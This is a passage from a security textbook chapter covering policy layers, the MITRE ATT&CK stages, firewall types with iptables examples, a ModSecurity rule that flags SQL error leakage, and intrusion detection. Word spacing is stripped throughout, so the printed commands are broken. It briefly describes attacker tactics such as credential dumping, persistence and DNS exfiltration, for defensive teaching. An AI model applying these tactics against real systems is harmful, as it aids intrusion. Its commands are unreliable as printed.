lewithintheparametersdefinedbythebusiness.Thisdoesn’tmeanthatallinformationresourcesshouldalwaysbeconfidential,haveintegrity,andbeavailable.DifferentinformationassetswillhavedifferentlevelsPolicies,Standards,and Procedures 67ofconfidentiality,andnotallinformationhastobeavailableallthetime.Thisisalsopartofwhatsecuritypolicyisfor—­tohelpclassifyandprioritizetheinformationassetsoftheorganization.Notallinformationresourcesarebitsandbytesstoredoncomputersystems.Oneareathatpolicyshouldalwaystakeintoconsiderationishowthehumanresourcesaretobehandled.Thismaynotalwaysbecodifiedininformationsecuritypolicy,buthumanresourcesshouldalwaysbeafactor,especiallywhenitcomestoprotectingagainstnaturaldisastersandothereventsthatmaybephysicallydangerousaswellasimpactinginformationassets.Policiesshouldberevisitedonaregularbasis.Theyaresufficientlyhigh-­levelthattheyshouldn’tchangeeverytimethereisanewsetoftechnologiesavailable,buttheyshouldevolvewithchangesinthethreatlandscape.Asinformationresourceschangeandthreatagentschange,thepoliciesmayneedtoadapttoberesponsivetothosechanges.Asthisisanareaofcorporategovernance,anypolicychangewouldhavetobeapprovedbywhatevermanagementstructureisinplace—­businessowners,boardofdirectors,andsoon.Keepinmindthatsecuritypoliciesareallhigh-­level.Theydon’tprovidespecifics,suchashowthepoliciesshouldbeimplemented.Ifyou’relookingatsecuritypoliciesandyou’restartingtothinkabouttheoperationalimpactsandhowtheadministratorwouldhandlethepolicy,you’retooclosetotheground,andit’stimetobeatyourwingsabitmoretogetmuchhigherup.Also,youarethinkingconceptuallyforwhatshouldbelong-­termratherthansomethingspecifictoapointintime.Thismeansthattechnologyandsolutionshavenoplaceinthepolicy.Otherinformationsecurityprogramelementswilltakecareofthoseaspects.SecurityStandardsThesecuritypolicyisatthetopofthefoodchain.Theremayalsobesubpoliciesthatflowdownfromthetop-­levelsecuritypolicies.Thesubpolicyshouldrefertotheoverallpolicysothehigh-­levelpolicydoesn’tgetlost.Belowthepolicylevel,though,aresecuritystandards.Astandardisdirectionabouthowpoliciesshouldbeimplemented.Thestandardstartsdownthepathofhowwegetfromstatementsofintenttoimplementation,sowestarttodrilldownfromthehighlevelofthepolicy.SecurityStandardsTherearetwomeaningsforthetermsecuritystandard.Therearesetsofstandardsthatprovideguidancefororganizationsandaremanagedbystandardsbodies.TheNationalInstituteofStandardsandTechnology(NIST)hasasetofstandards,documentedinseveralspecialpublications.TheInternationalOrganizationforStandardization(ISO)maintainsISO27001andISO27002.Thereareotherstandardsdocumentsthatmayberelevanttoyou,dependingonwhereyouareintheworld.68 Chapter3  SecurityFoundations■Take,forexample,apolicythatstatesthatallsystemswillbekeptup-­to-­date.Togetclosertoimplementationofthatpolicy,youmighthavestandardsthatrelatetodesktopsystems,serversystems,networkdevices,andanyembeddeddevice.Therequirementsforeachofthosedevicetypesmaybedifferent,sothestandardsforthemmaybedifferent.Desktopsystemsmayjustbeexpectedtotakeallupdatesastheycome,withtheexpectationthatanypotentialoutagecouldberemediatedquicklyontheoffchancethattherewasanoutageonahandfulofusers’desktops.Servers,ontheotherhand,wouldbeinplacetoservicecustomersandpossiblyhaverevenueimpacts.Sincethat’sthecase,thestandardmaybedifferent.Thestandard,stillfocusedonhowtoachievetheobjectivesetoutinthepolicy,maysaythatthereisaqualityassuranceprocessthatisnecessarybeforepatchesmaybedeployed.Theservicelevelagreement(SLA)onthoseserversystemsmaybecompletelydifferentintermsofacceptableoutages.Thestandardfortheserversystemsmaybedifferentfromthedesktopsystems,butbotharewritteninserviceofthehigh-­levelpolicythatsystemsarekeptup-­to-­date.Thestandardwoulddefineanythingthatwasvague(whatdoes“up-­to-­date”mean?)inthepolicytomakeitrelevanttooperationalstaff.Thestandardsarestillhighlevelinthesenseofsettingrequirementsforhowpoliciesshouldbeimplemented.Theserequirementsstillneedtobeimplemented.Thatleadsustoanotherstep.ProceduresProceduresaretheactualimplementationofthestandard.Theseprovideguidanceabouthow,specifically,thestandardsareachievedatagranularlevel.Thismaybeaccomplishedwithstep-­by-­stepinstructionsonwhatneedstobedone.Theremaybemultipleproceduresforeachstandard,sincetheremaybemultipleorganizationsinvolvedinimplementingthestandard.Youcanseethatwithhigh-­levelguidancelikethatinapolicy,youlikelywouldn’thavetotouchitoften.Policiesarerevisitedonaregularbasis,butthetimescaleforwhenthepolicieschangewouldbemeasuredinyears,ifthepoliciesarewellconsideredandwellwritten.Standards,though,mayneedtobeupdatedmoreregularly.Informationassetchangeswouldresultinstandardsbeingupdated.Anychangeintechnologywithintheorganizationmayresultinanupdatetostandards.Procedureswilllikelychangeevenmoreregularly.Asorganizationsinthecompanyshiftorresponsibilitiesshift,procedureswillshifttoaccommodatethem.Additionally,agoodprocedurewouldhavefeedbackloopsbuiltinsotheprocedurecouldberegularlyrevisedtobemoreefficient.Anychangeinautomationwouldresultinprocedurechanges.Aswegothrougheachlayerfromthetopofthesecurityprogramdowntotheverybottom,theresultismoreregularupdatesaswegettospecificstepsinimplementationandadministration.GuidelinesYoumaynotrunintoguidelinesasyouarelookingatsecurityprograms.Guidelinesarenotstandardsinthattheymaynotberequirements.Instead,theyaresuggestionsonhowpoliciesmaybeimplemented.Aguidelinemayprovideinformationaboutbestpractices,withthehopethatthebestpracticesmayfollow.OrganizingYourProtections 69OrganizingYourProtectionsTherearealotofdifferentwaysofthinkingaboutinformationsecurity,ofcourse.Fromagovernanceperspective,youneedtothinkaboutpolicies,standards,andprocedures.However,onceyouhaveallofthoseinplace,youstillneedtothinkabouthowyouaregoingtobestprotectyourassets,nottomentionensureyouareabletodetectanyattempttonegativelyimpactthoseassets,nomatterwhattheyare.Onewaytothinkaboutevaluatingprotectionsofyourassetsisbyreviewingwhatattackersaremostlikelytodo.Ifyouknowwhatactionstheattackersaregoingtotake,youcoulddevelopnotonlyprotectionsbutalsodetectionsofthoseactions,whichhelpsyoutobeprepared.WhileyoucanusetheLockheedMartincyberkillchainortheattacklifecycleadvocatedbyFireEyeMandiant,anotherwaytogetevenmoredetailistomakeuseoftheMITREATT&CKFramework.TheMITRECorporationdevelopedATT&CKin2013tocollectcommontactics,techniques,andprocedures(TTPs)usedbyattackers.ThewayMITREsawit,existingframeworkslikethecyberkillchainweretoohighlevelandnotapplicabletoreal-­worldincidents.TheideabehindATT&CKistocollecttheseTTPsfromadversaries,sothecollectionisalwaysgrowingasmoreTTPsareidentified.TheseTTPsaredescribedindetail,soprotectionanddetectioncontrolscanbedeveloped.Whiletherearedifferentattackertypes,includinghacktivistswhomaybejustlookingtomakeapointinthepublicconsciousness,themostdangerousonesareonesthataresometimescalledadvancedpersistentthreats(APTs).TheseareattackerswhousealargenumberofTTPstogainaccesstoabusinessenvironmentandremainwithintheenvironmentforaslongastheycan.Insomecases,theseattackersmayremaininplaceforyears.Therehavebeencasesinrecentmemorywhereattackershavebeenfoundtohaveremainedinplaceforsevenortenyearsormore.Whileyoumaygetsomeattackerswhomightdoaone-­and-­doneapproach,wheretheyaretargetingindividualusersandwanttojustgetwhattheycanandgetout,increasingly,whatweseeistheseAPTattackers.ThisisworthkeepinginmindasyoulookthroughthedifferentphasesoftheATT&CKframework.TheATT&CKFrameworkisbrokenoutintothefollowingstages.Youmayfindthesearen’tnecessarilyintheorderanattackermayfollow,astheremaybesomeoverlaporevenbouncingbackandforth.Additionally,someTTPswillfitintodifferentcategorieshere.Reconnaissance  Theattackerisgatheringinformationaboutthetargetinthisstage.Theymaybesearchingthroughopensourceswheredataisfreelyavailable.Theymayalsobeusingclosedsourcestheyhaveaccessto.Additionally,theymaybeperformingscanningactivitieshere.Thisstagealsoincludesattackersusingphishingtechniquestotrickvictimstogiveupdata.ResourceDevelopment  Theattackerhastodoalotofworktocreateaninfrastructuretheywillusetolaunchattacksfrom.Thismayincluderegisteringdomainnames,creatingaccounts,acquiringsystems(probablybycompromisingothervictimsandusingtheircomputinginfrastructure).Theymayalsoneedtoacquiretoolstheydon’thavethemselves.Thiscouldberentingorpurchasingtoolsetsthatmaybeavailablethroughcriminalchannels.70 Chapter3  SecurityFoundations■InitialAccess  Theattackerherecompromisesthefirstsystems.Theymaycompromiseanexistingpublic-­facingapplicationorwebsite.Theymayusephishingtogetmalwareinstalledonatargetsystem.Theyaregettingtheirinitialfootholdintotheorganizationinthisstage.Anytechniquethatgivesthemaccess,evenifit’sassimpleasmakinguseofacompromisedsetofcredentials,fallsintothisstage.Execution  Therearealotoftechniquesanattackermayusetogetcodeexecuted.Theattackerdoesn’talwayshavedirectinteractiveaccesstothesystem,meaningtheycan’tjustdouble-­clickaniconorrunacommand-­lineprogram.Theymayrelyonothertechniquestogettheircodeexecuted.Therearealotofwaysofdoingthis,includingusingscheduledtasks,interprocesscommunication,systemservices,oroperatingsystem–specifictechniqueslikeusingtheWindowsManagementInstrumentation(WMI)system.Persistence  Withpersistence,theattackeristryingtomaintainconsistentaccesstothesystemtheyhavecompromised.Systemsreboot,sometimestheyarepowereddownandlaterrestarted,orsometimesuserslogoutandthenlaterlogbackin.Thismeansprogramsthatareexecutingwillstopexecutingunlessthereisawaytogettheprogramexecutingagain.Astheattackerisnotsittingphysicallyatthesystem,wheretheycandowhattheywant,it’snecessaryfortheattackertohaveameansofgettingremoteaccess.Thisisoftendonethroughsoftwaretheattackerhasinstalledonthesystem.Thissoftwareneedstoexecute,likelywhenthesystemboots.Thisisanothercasewheresystemservicesareuseful,thoughscheduledtasksarealsousefulasaresystemanduserconfigurationsthroughtechniqueslikeregistrykeysonWindowssystems.Linuxsystemsmayusestartupfilessuchas.bashrctogetprogramsexecutedwhenauserlogsin.PrivilegeEscalation  Withprivilegeescalation,attackersaretryingtogetthehighestlevelofprivilegestheycan.Mostusersdon’thavemuchinthewayofaccesstotheirsystems.Theycangettotheirdataandrunprograms,buttheycan’tdousefulthingslikeinstallsystemservicesorextractsystemmemory.Thisiswheregettingadditional,elevatedprivilegesishelpful.Theymaydothisbyinjectingcodeintoanexistingprocessthatalreadyhasadministrativeprivileges.Theymaygetaservicetorunatboottime,sincethebootprocessautomaticallyhaselevatedprivileges.TherearealotofTTPsforprivilegeescalationsinceit’softenanecessarystepforanattackertoremainintheenvironmentandgatherdata,likecredentials,theyneedforfurthermovement.DefenseEvasion  Attackerswillneedtogetthroughalotofdifferenttypesofdefense.Businessescertainly,thoughpeopleaswell,makeuseofsoftwareonsystemstoprotectagainsttheseveryattackers.Thismaybeanti-­malwareorsomeotherdetectionorpreventionsoftware.Attackersneedtoexecutesoftwareinwaysthatwon’tbeseenasmaliciousorsuspicious.Thismaybeusinganold-­schooltechniquelikeusingarootkit,wheretheattackermaybeprovidedremoteaccesswhilealsohidingallofthesoftwarebeingusedfromtheuserorothersoftwarelookingforit.Byfar,thisisthestageorcategorywiththemostTTPs.Asanexample,privilegeescalation,animportantphaseintheattackprocess,has12techniquesasofthiswriting,whereasdefenseevasionhas37.OrganizingYourProtections 71CredentialAccess  Applicationsandsystemstypicallyrequireusernamesandpasswordstograntaccess.Attackerswillwanttotrytogetthesecredentialsforuseelsewhere.Thismaybethroughusingaphishingattackbysendinganemailtoavictimtogetthatpersontoprovideusernameandpasswordtotheattacker.Itmaybefromdumpingcredentialsoutofmemory—­fromtheoperatingsystembutalsofromapplicationsthatmaybeholdingontocredentials.Attackersmayalsobeabletousetacticstogetthenetworktogiveupcredentialsbyforcingauthenticationagainstnetworkserversthatcanprovideinformationtotheattacker.Discovery  Attackersareprobablynotgoingtobesatisfiedgettingaccesstojustyoursystem.Theywillbelookingforadditionalsystemstogetaccessto.Theywillwanttolookaroundatwhatyouhaveaccessto,fromsystemstoapplications.Theywillbegatheringalotofdetailtoseewhatelsetheymaybeabletoaccesswithinthetargetenvironment.LateralMovement  Oneofthereasonsfordoingdiscovery,inadditiontoseeingwhatdatayoumayhaveaccesstothatmaybestolenforprofit,istodeterminewhatothersystemsmaybeattackedfromyoursystem.Theattackermaymakeuseofyouandwhateveryoursystemhasaccessto.Theideahereistocompromisealotofsystemsbecausemoresystemsmeansmoredatathatcouldbeusedorstolen.Thismaybethroughtheuseofexistingcredentialsthathavealreadybeenstolen.Itmayberemoteexploitationofanothersystem.Itmaybethroughtheuseoftheemailofthecurrentvictimtocontactotherpotentialvictims.Collection  Justaswithdiscovery,collectionisaboutgatheringinformation.Thismaybeinformationthatcouldbeusedtoattackothersystems,oritcouldbeinformationtheattackerwantstosteal(exfiltrate)forsaleorusesomewhereelse.Onceanattackerstartstocollectdata,thismaybemorevisiblethansomeoftheotherstagesbecausetheyareleavingbehindartifacts.Afterall,whiletheyarecollectingdata,thatdatahastobestoredsomewhere.Becausetheattackerwillbestoringinformationtemporarilyaheadofexfiltration,fileswithstrangenamesorotherdistinguishingcharacteristicsmaystartshowingupinplaces.Commandand Control  Keepinmindthatattackerswillwanttomaintainaccesstothesystemsforaslongaspossible.Afterall,iftheyhavetargetedyourorganization,youhavesomethingtheywant.It’slikelyyouwillcontinuetocreatethisthingtheywant,whetherit’sintellectualpropertyorcustomerinformationorusernamesandpasswordsorcreditcarddata.There’snopointinwastinganopportunitybygettinginandthenleaving.Thismeanstheyneedtoretainremotecontrolovertheentireenvironment.Thisstageiswheretheysetupremoteaccesstothesystemsintheenvironment.TheymaymakeuseofcommonlyusedprotocolsliketheHypertextTransferProtocol(HTTP)andabuseitbyembeddingcommandsbetweentheservertheycontrolandsystemsinyourenvironment.TheycanalsomisuseotherprotocolsliketheDomainNameSystem(DNS)ortheInternetControlMessageProtocol(ICMP).72 Chapter3  SecurityFoundations■Exfiltration  Eveniftheycontinuetoremainintheenvironment,theywillwanttogetdatatheyhavecollectedout.Thisiswheretheyexfiltratethedata.They,again,maymakeuseofcommonlyusedprotocolssincetheyarelesslikelytobesuspected.Thegoalisalwaysgoingtobeevadingdetectionasbestaspossible.However,evenwhentheyusecommonlyusedprotocols,youcandetecttheexistenceoftheattackerbyfollowingtheTTPsprovidedintheframework.IfanattackerissendingdataoutusingDNS,forinstance,themessagesizeislikelytobeunusuallylarge,solookingforthoseunusuallylargemessagesmayletyoucatchtheattackerinaction.Impact  Thisiswheretheattackermaydecidetoburnthehousedown,asitwere.Someattackerswillgetwhattheywantandthenteareverythingdownastheyleave.Othersmaydothesameiftheyhappentobecaught.Asyouaretryingtogetthemoutofyournetworkandsystems,theyaretearingdownasmuchastheycanonthewayout.Thismaybedestructionofdata,diskwiping,encryptionofdata(meaningransomwareattackswouldfallintothiscategory),denial-­of-­serviceattacksorother,similarlydestructiveactions.TheTTPsreferencedinthematrix,whichyoucanfindontheMITREwebsite(https://attack.mitre.org/matrices/enterprise/),areregularlyupdatedasmorebecomeknown.EachTTPwillhavedetailsassociatedwithit,andMITREwillprovidemitigationstepstopreventtheattackfromsucceedingtobeginwith.YoumayalsogetadviceonhowtodeterminewhethertheattackerismakinguseofthatTTP.SecurityTechnologyInvariably,securityprogramsrequiresometechnologytoimplement.Thenumberoftechnologysolutionsthatmaybeusedwithinanenterprisecontinuestogrow.Thebestwaytoprotectanenterpriseisnolongeraboutputtingafirewalloutinfrontofthenetworkandconsideringyourselfprotected,evenifthatwereevertherealityitwasthoughttobe.Today,theattackvectorshavechangedalotfromwhattheywereevenadecadeago.Today’stechnicalsolutionsaremultilayeredandaren’tentirelyfocusedonprevention.Theassumptiontodayisthatpreventionisn’tpossibleiftheexpectationisthat100percentofattackswillberepelled.Asaresult,detectionisessential.Evendetectionsolutionsaremultilayeredbecauseofthenumberofentrypointsintothenetwork.Sincedetectionisapassiveeffort,itneedstobefollowedbyanactiveone.Thiscanbeincidentresponse,andincidentresponsemayrequireautomatedcollectionofartifacts.Allofthesemayrequiredifferenttechnologysolutions.FirewallsThefirewallisatraditionalsecuritydeviceinanetwork.Justsayingthatafirewallisinplace,though,doesn’treallyexplainwhatishappeningbecausethereareseveraltypesoffirewallsrunningupthenetworkstack.Afirewall,initsoriginalmeaning,wasawallthatSecurityTechnology 73keptfirescontained.Youimplementedafirewalltokeepfirescontainedtosectionsofabuilding.Thesameistrueforthefirewallinacar.Theenginecompartmentiscombustible,consideringthefuel,oxygen,andelectricitymixturethere.Carmanufacturersputafirewallintocontainanyfirethatmaybreakoutsoitdoesn’tspreadtothepassengercompartment.Thetermwastakeninthelate1980stoapplytonascenttechnologybeingusedtoprotectnetworks.PacketFiltersAtabasiclevel,afirewallisapacketfilter.Lotsofdevicesofferthecapabilitytofilterpackets,whichissometimesaccomplishedwithaccesscontrollists.Routersandswitcheswilloftenhavetheabilitytoperformpacketfiltering.Thispacketfilteringissometimesimplementedinanaccesscontrollist.Packetfiltersmakedeterminationsaboutthedispositionofpacketsbasedonprotocol,ports,andaddresses.Portsandaddressescanbefilteredbasedonbothsourceanddestination.Packetscanbedropped,meaningtheydon’tgetforwardedontothedestination,andthereisalsonoresponsemessagesenttotheoriginatingsystem.Theycanalsoberejected,meaningtheywon’tbesenttothedestination,buttherejectingdevicewillsendanInternetControlMessageProtocol(ICMP)errormessagetothesenderindicatingthatthedestinationisunreachable.Thisisnotonlythepoliteapproach,sincedropswillincurretransmits;it’salsogenerallyconsideredthecorrectapproachfromtheprotocolstandpoint.However,whenitcomestosystemsecurity,droppingmessagesmayjustmakemoresense.Ifmessagesjustgetdropped,it’suncleartothesendingsystemwhathappened.Thetargetsystemisessentiallyinablackhole.Ofcourse,packetscanalsobeaccepted.Thiscanbedoneasamatterofrules,oritmaybepolicy.Packetfiltersmayhaveapolicythatgovernsthebehaviorofthefilter.Thismeansthereisablanketrulethatappliestoeverythingunlessexceptionsareapplied.Adefaultdenypolicy,themostsecurewaytoimplementapacketfilter,willdropeverythingthatisn’texplicitlyallowedthrough.Youmayalsohaveadefaultacceptpolicy,whichmeanseverythingisallowedthroughunlesssomethingisexplicitlyblocked.YoumayhaverunacrosspacketfiltersifyourunLinuxsystems.Whilethehost-­basedfirewallincludedinmostLinuxdistributionshasothercapabilities,itcanalsofunctionasabasicpacketfilter.YoucansetapolicyondifferentchainswiththeiptablesfirewallthatisintheLinuxkernel.Asanexample,thefollowinglinesshowrunningiptablestosetadefaultdenypolicyontheINPUT,OUTPUT,andFORWARDchains,whicharecollectionsofrulesappliedtospecificmessageflows.iptablesPolicySettingsiptables-­PINPUTDROPiptables-­POUTPUTDROPiptables-­PFORWARDDROPPacketfilteringisbasicinitsfunctionality.WhilethesepacketfilterscanbegoodforinboundtrafficorevenforkeepinginternalusersfromaccessingspecificportsorIPaddresses,theyarenotgoodformorecomplexfiltering,suchasallowinginboundtraffic74 Chapter3  SecurityFoundations■thatisaresponsetomessagesthatoriginatedontheinsideofthenetwork.Forthis,weneedtokeeptrackofthoseoutboundconnections,soweneedsomethingmorethanjustapacketfilter.StatefulFilteringNotlongaftertheinitialdevelopmentofpacketfilterscamethedevelopmentofstatefulfirewalls.Thefirststatefulfirewallwasdevelopedinthelate1980s,justlikepacketfilterswere.Thesearefirewalltypesweshouldknowwellbecausetheyhavebeenaroundforaboutthreedecadesatthispoint.Thisdoesnotmean,though,thatthesestatefulfiltershavebeeninuseallthattime.Astatefulfirewallkeepstrackofthestateofmessages.Thismeansthefirewallhastohaveastatetable,soitknowsaboutallofthetrafficflowspassingthroughit.InthecaseoftheTransmissionControlProtocol(TCP),it’stheoreticallyeasiersincetheflagstellthestorywhenitcomestothestateofthetrafficflow.AmessagethathasjusttheSYNflagturnedonisaNEWconnection.Itremainsinthisstateuntilthethree-­wayhandshakehasbeencompleted.Atthatpoint,thestateoftheflowbecomesESTABLISHED.Insomecases,youmayhavemessageflowsthatareRELATED.Asanexample,theFileTransferProtocol(FTP)willsometimesoriginateconnectionsfromtheinsidetotheoutside,meaningfromtheservertotheclient.Inthiscase,theserver-to-clientconnectionfortransferringthefileisrelatedtothecontrolconnectionfromtheclienttotheserver.EvenwithTCP,theflagsdon’ttellthewholestory.Afterall,itwouldbeeasyenoughtosendmessageswiththecorrectflagssettogetthroughafirewallthatwasonlylookingattheflagstodeterminewhatthestateofthecommunicationis.TheUserDatagramProtocol(UDP)hasnostatethatisinherenttotheprotocol.Thismakesitimpossibletolookatanyflagsorheaderstoinferstate.Statefulfirewallsdon’tjustlookattheflagsorheaders,however.Theykeeptrackofallthecommunicationstreamssotheyaren’trelyingontheprotocol.Theywatchmessagescominginandgoingoutandnotethemalongwiththeirdirectionalitytodeterminewhatthestateis.Thismeansthefirewallknowswhichendistheclientandwhichendistheserver.Whenyouhaveastatefulfirewall,younotonlycanmakedecisionsbasedontheportsandaddresses,youcanalsoaddinthestateofaconnection.Forexample,youcanseeapairofiptablesrulesinthefollowingcodelistingthatallowallconnectionsthatareNEWorESTABLISHEDintoport22,whichistheSecureShell(SSH)port.Additionally,connectionsthatareestablishedareallowedoutoninterfaceeth0.Withadefaultdenypolicy,newconnectionswon’tbeallowedoutoftheinterface.iptablesStateRulesiptables-­AINPUT-­ieth0-­ptcp-­-­dport22-­mstate-­-­state\NEW,ESTABLISHED-­jACCEPTiptables-­AOUTPUT-­oeth0-­ptcp-­-­sport22-­mstate-­-­stateESTABLISHED\-­jACCEPTSecurityTechnology 75Thisgetsusalittlefurtherinourcapabilitiestomakedecisionsaboutwhatpacketstoallowordenyintoournetworks.Whileitdoesn’tseemlikealot,thesecapabilitiesprovidealotofpotentialforkeepingbadpeopleout.DeepPacketInspectionOneofthebiggestissueswhenitcomestofirewallsisthattheyallowknownservicesthrough.Afirewallwillallowconnectionstoawebserverthrough.Thismeansattacktraffictothewebserverwilljustbeletthroughthefirewall.Attacktrafficthatusestheapplicationagainstitselfwillsetupconnectionsjustlikeanyotherclient.Fromthestandpointofthepacketfiltersandstatefulfiltering,themessageswillpassthrough.Becauseofthat,weneedtogodeeper.Justlookingattheprotocolheadersisinsufficient,becauseeverythingwilllookcorrectandlegalintheheaders.Weneedtostartlookingathigherlayersofthestack.Adeeppacketinspection(DPI)firewalllooksbeyondtheheadersandintothepayloadofthepacket.Withthisapproach,it’seasiertoidentifymalwareandotherinboundattacks.ADPIfirewallwouldrequiresignaturesthatitshouldlookforinthepackettodeterminewhethersomethingisgoingtobemalicioussoitcanblockthetrafficfromcomingintothenetwork.Todothis,thefirewallhastoparsetheentiremessagebeforeitcanmakeanydeterminations.Thismeansithastohaveatleasttheentirepacket,meaninganyfragmentationattheIPlayerhastoarriveandbereassembled.Insomecases,itmayneedtheentirestream,whetherthat’sUDPorTCP.Thiscertainlymeansalittlelatencyonthearrivalofmessages.Packetfiltersandstatefulfirewallsdon’tneedtoreassembleanything,assumingtheentireheaderhasarrived.Anymessagethatdoesn’thavetheentiresetofIPandTCP/UDPheadersislikelyaproblemanyway,sincethat’swellunder100bytes.Fragmentingamessageatunder100bytescouldbearesultofmalicioustraffic,tryingtofoolafirewallorothersecuritysolution.Theybelongtogether.Onlylookingattheheadersislimiting,though,especiallysincesomanyattackstodaycomeinoverthehigher-­layerprotocols.ADPIfirewallprovidestheabilitytoinspectthosehigher-­layerprotocols.Oneconsiderationtokeepinmind,though,isthatencryptedtrafficcan’tbeinspected.Thefirewallwon’thavethekeytodecryptthemessagetolookatit.Anyman-­in-­the-­middleapproachtoencryptiononthepartofthefirewallviolatestheend-­to-­endexpectationofmostencryptionsolutionsandusers.Theheaders,ofcourse,aren’tencrypted.Iftheywere,nointermediatedevicewouldbeabletodeterminewhereanythingwasgoing.Thismeanspacketfiltersandstatefulfirewallsarenotimpactedbyencryption.DPIfirewalls,though,are.Thismeansthatwiththemovetoencryptionoverallweb-­basedconnections,DPIfirewallsdon’tdoalottoprotectthewebserver.ApplicationLayerFirewallsThereareapplicationlayerfirewallsinadditiontotheDPIfirewalls.Whilethesefirewallsalsoinspectthepacket,theycommonlyarespecifictoaparticularprotocol.Forexample,invoiceoverIP(VoIP)networks,adevicecalledasessionbordercontroller(SBC)canbeused.76 Chapter3  SecurityFoundations■ThisisadevicethatunderstandstheVoIPprotocols—­commonlyeitherH.323ortheSessionInitiationProtocol(SIP).Assuch,itnotonlycanmakedeterminationsaboutthevalidityofthemessagingbutalsocanopenupdynamicpinholestoallowtheReal-­timeTransportProtocol(RTP)mediamessagesthrough,sincetheywouldbeoverdifferentportsandprotocolsthanthesignalingmessageswouldbe.AnSBCwouldbeanexampleofanapplicationlayerfirewall,sinceithasthecapabilityofmakingdecisionsaboutallowingtrafficthrough.Itmakesthesedecisionsbasedonunderstandingtheapplicationlayerprotocolandcommonstateflowsofthatprotocol.Anothercommonapplicationlayerfirewallwouldbeawebapplicationfirewall(WAF).TheWAFusesasetofrulestodetectandblockrequestsandresponses.Giventhenumberofweb-­basedattacks,keepingupwiththeserulescanbechallenging.WhilethereareseveralcommercialWAFs,thereisalsoModSecurity,whichisanopensourcemodulethatcanbeusedwithApachewebservers.Therulescangetcomplicated,andyoucanseeanexampleinthefollowingcodelisting.mod-­securityRuleSecRuleRESPONSE_BODY"@rx(?i)(?:suppliedargumentisnotavalidMySQL|Columncountdoesn'tmatchvaluecountatrow|mysql_fetch_array\(\)|onMySQLresultindex|YouhaveanerrorinyourSQLsyntax;|YouhaveanerrorinyourSQLsyntaxnear|MySQLserverversionfortherightsyntaxtouse|\[MySQL\]\[ODBC|Columncountdoesn'tmatch|Table'[^']+'doesn'texist|SQLsyntax.*MySQL|Warning.*mysql_.*|validMySQLresult|MySqlClient\.)"\"capture,\setvar:'tx.msg=%{rule.msg}',\setvar:tx.outbound_anomaly_score=+%{tx.critical_anomaly_score},\setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},\setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\setvar:tx.%{rule.id}-­OWASP_CRS/LEAKAGE/ERRORS-­%{matched_var_name}=%{tx.0}"Theruleyouseelooksintheresponsebodyforthemessagethatisfoundafter@rx.Thisindicatesthatwhatcomesnextisaregularexpression.Theregularexpressiondescribesthemessagetheruleislookingtomatchon.Iftherulematches,theregularexpressionmatchwillbeplacedintothetransactionvariablecollectionbecauseofthecaptureaction.Therewillalsobeseveralvariablesthatgetplacedintothetransactionvariablecollection.Inadditiontocapturinginformation,whichcanbeloggedandreferredtolaterorbeusedforalerting,ModSecuritycanblockasanaction.ThiswillpreventthemessagefromgoingSecurityTechnology 77pasttheWAF.WhatthismeansisthattheWAFsitsinfrontofthewebserverthatisbeingprotected.Sometimes,aWAFlikeModSecurityisimplementedontheedgeofthenetworkasareverseproxy,soclientssendmessagestothereverseproxy,whichhandlesthemessageonbehalfoftheserver,parsingitforpotentialbadrequests,beforesendingitontotheactualwebserver.Responsesalsopassthroughthereverseproxy.Thesearejustacoupleofexamplesofapplicationlayerfirewalls.Theymayalsobecalledapplicationlayergateways.Anydevicethatcanmakedecisionsbasedonwhatishappeningintheapplicationlayerprotocolandthenhavetheabilitytodropthemessage,regardlessoftheapplicationlayerprotocol,couldbeconsideredanapplicationlayerfirewall.UnifiedThreatManagementSometimesafirewallaloneisn’tenough.Eveninthecaseofapplicationlayerfirewalls,youstillneedtoprotecttheusers.Usersareoftenthemostvulnerablepointonyournetwork,andtheyareregularlytargetsofsocialengineeringandmalwareattacks.Aunifiedthreatmanagement(UTM)deviceisonethatconsolidatesalotofsecurityfunctionsintoasinglesystemthatmaybeplacedatasinglepointinthenetwork.ThisUTMwouldreplacethefirewall,intrusiondetection,andintrusionprotectiondevicesaswellasofferingantivirusprotection.Therearedownsidestothistypeofapproach.Younowhaveasinglepointinyournetworkwhereallofyoursecurityishandled.Ifthisdevicefailsforwhateverreason,youhavenobackstopsinplace.Ifyourfirewallfailed,forinstance,youwouldstillhaveintrusiondetectionsystemstocatchanythingthatgotthrough,ifthathadhappened.WithUTM,youhaveoneplace,anditneedstoworkallthetimeandbeconfiguredcorrectlyallthetime.IntrusionDetectionSystemsTherearetwodifferenttypesofintrusiondetectionsystems(IDSs)thatyoucanfind.Thefirstisahost-­basedIDS.Ahost-­basedIDSwatchesactivityonalocalsystem,suchaschangestocriticalsystemfiles.Itmayalsowatchlogfilesorauditothersystembehaviors.Oneofthechallengeswithahost-­basedIDSisthatonceanattackerisinapositiontotriggerahost-­basedIDS,theyareonthesystem,whichmeanstheycanbecomeawarethattheIDSisinplaceandmakeplansaccordingly.ThesecondtypeisanetworkIDS.Wherefirewallshavetheabilitytoblockorallowpacketsinthenetworkstream,anetworkIDScantakesomeofthesamesortsofrulesandgeneratelogmessages.Aruleforanintrusiondetectionsystemcangenerallybebasedonanylayerinthenetworkstack.Aslongasyoucancreatesomesortofidentificationforthemessagesyouwanttologoralerton,youcanwritearuleforanIDS.Aswiththefirewalls,thereareanumberofcommercialoptions.Therearealsosomeopensourceoptions,oneofthebiggestnamesbeingSnort,whichiscurrentlyownedbyCisco,butfreeaccesstotheprogramandsomecommunityrulesisstilloffered.AnetworkIDSwatchesallnetworktrafficthatpassesbythenetworkinterface.Thismeansthatplacementisimportant.Theremaybedifferentapproachestoplacement,dependingontheIDSproductbeingused.OneoftheseapproachesistoplacetheIDS78 Chapter3  SecurityFoundations■connectedinparallelratherthaninseriesattheveryperimeterofthenetworksoallnetworktrafficcomingincanbeobserved.Figure 3.3showsasimplifieddiagramusingthisapproach,withtheIDSbehindthefirewallbutnotinthetrafficflowdirectly.TrafficgetsshuntedtotheIDSsoitcandetectwithoutgettinginthewayorcausinganetworkfailure.Anotherapproachistoplacesensorsindifferentpartsofthenetworksoyoudon’thaveasingledevice.Thisapproachmaybeespeciallyusefulifyouarealsotryingtolookatpotentialinsiderattacks.FIGURE 3.3 